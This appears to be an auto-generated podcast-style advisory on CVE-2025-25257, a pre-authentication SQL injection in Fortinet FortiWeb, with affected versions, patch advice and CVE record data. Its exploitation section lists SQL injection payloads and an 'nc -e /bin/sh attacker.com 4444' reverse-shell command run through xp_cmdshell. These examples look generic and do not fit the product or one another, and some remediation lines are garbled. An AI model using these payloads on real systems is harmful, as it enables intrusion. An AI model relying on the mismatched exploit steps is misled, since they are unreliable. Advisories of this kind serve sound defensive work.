FortiWeb: pre-auth SQL injection leading to remote code execution in FortiWeb (CVE-2025-25257) #shorts

Summary

Welcome to the Security Today podcast. In this episode, we’re unpacking CVE-2025-25257: a critical, pre-authentication SQL injection vulnerability in Fortinet’s FortiWeb web application firewall. Public proof-of-concept code has already surfaced, and multiple customer instances have been compromised. We’ll cover what’s at risk, how the flaw works, and what you need to do to stay safe.

Product details

FortiWeb is Fortinet’s web application firewall and Fabric Connector used to protect web applications from attacks. The vulnerable releases span versions 7.0.0 through 7.0.10, 7.2.0 through 7.2.10, 7.4.0 through 7.4.7, and 7.6.0 through 7.6.3. Fortinet customers often deploy FortiWeb in front of critical web servers and application infrastructures to filter malicious traffic.

Vulnerability type summary

This is an SQL Injection vulnerability (CWE-89) exploitable without authentication, allowing arbitrary SQL commands to be injected via specially crafted HTTP or HTTPS requests. The impact is elevated from data theft to full remote code execution, making it a critical pre-auth RCE flaw.

Details of the vulnerability

Researchers from pwntheplanet first disclosed a proof-of-concept on Reddit, demonstrating how an attacker can send malicious queries to FortiWeb’s HTTP interface to modify backend database calls. By chaining SQL injection with built-in OS command execution routines, an unauthenticated attacker can achieve remote code execution on the appliance. Fortinet confirmed the issue, noting public exploits in the wild and issuing patches in versions 7.0.11, 7.2.11, 7.4.8, and 7.6.4. Multiple customer deployments were breached before patching, underscoring the urgency.

Conclusion

If you manage FortiWeb appliances, update to the latest patched releases immediately. Disable any exposed management interfaces until you’ve applied the fixes. Review your logs for unusual SQL queries or new service processes and rotate any credentials that may have been exposed. That’s it for today’s deep dive—stay secure and join us next time for more vulnerability updates.

Watch the full video on YouTube: CVE-2025-25257

Remediation and exploitation details

This chain involves the following actors

  • Unauthenticated attacker: Exploits SQL injection flaw

This following systems are involved

  • FortiWeb (Web application firewall): Vulnerable target

Attack entry point

  • HTTP/HTTPS interface: Web management endpoint parameter susceptible to SQL injection via crafted requests

Remediation actions

FortiWeb administrator
Apply published patches for versions 7.0.0–7.0.10, 7.2.0–7.2.10, 7.4.0–7.4.7 and 7.6.0–7.6.3
FortiWeb
FortiWeb administrator
Upgrade to fixed FortiWeb releases beyond patched versions
FortiWeb

Exploitation actions

Passive reconnaissance

Unauthenticated attacker
Scan internet for exposed FortiWeb management endpoints
FortiWeb
Examples:
  • Search for FortiWeb headers via Shodan or similar services

Parameter fuzzing

Unauthenticated attacker
Probe suspected endpoints by sending benign and targeted payloads to identify injectable parameters
FortiWeb
Examples:
  • GET /api/v1/ws/sslvpn_websession_list?filter='

Pre-auth SQL injection

Unauthenticated attacker
Craft SQL injection payload designed to extract database schema or escalate to operating system commands
FortiWeb
Examples:
  • '|| (SELECT version())--

Remote code execution via SQL injection

Unauthenticated attacker
Send malicious HTTP POST containing the SQL payload to the vulnerable API endpoint
FortiWeb
Examples:
  • POST /api/v1/auth HTTP/1.1 Host: target Content-Length: ... username=admin' UNION SELECT ... -- &password=foo

Command injection through database

Unauthenticated attacker
Leverage database functions or stored procedures to write and execute system-level commands, achieving full remote code execution
FortiWeb
Examples:
  • EXEC xp_cmdshell 'nc -e /bin/sh attacker.com 4444'

Related Content

NOTE: The following related content has not been vetted and may be unsafe.

CVE database technical details

CVE ID
CVE-2025-25257
Description
An improper neutralization of special elements used in an SQL command ('SQL Injection') vulnerability [CWE-89] in Fortinet FortiWeb version 7.6.0 through 7.6.3, 7.4.0 through 7.4.7, 7.2.0 through 7.2.10 and below 7.0.10 allows an unauthenticated attacker to execute unauthorized SQL code or commands via crafted HTTP or HTTPs requests.
Provider
fortinet
CWE / problem types
Execute unauthorized code or commands
Affected Software Versions
Fortinet:FortiWeb:[{'versionType': 'semver', 'version': '7.6.0', 'lessThanOrEqual': '7.6.3', 'status': 'affected'}, {'versionType': 'semver', 'version': '7.4.0', 'lessThanOrEqual': '7.4.7', 'status': 'affected'}, {'versionType': 'semver', 'version': '7.2.0', 'lessThanOrEqual': '7.2.10', 'status': 'affected'}, {'versionType': 'semver', 'version': '7.0.0', 'lessThanOrEqual': '7.0.10', 'status': 'affected'}]
Date Published
2025-07-17T15:10:04.532Z
Last Updated
2025-07-17T15:31:33.264Z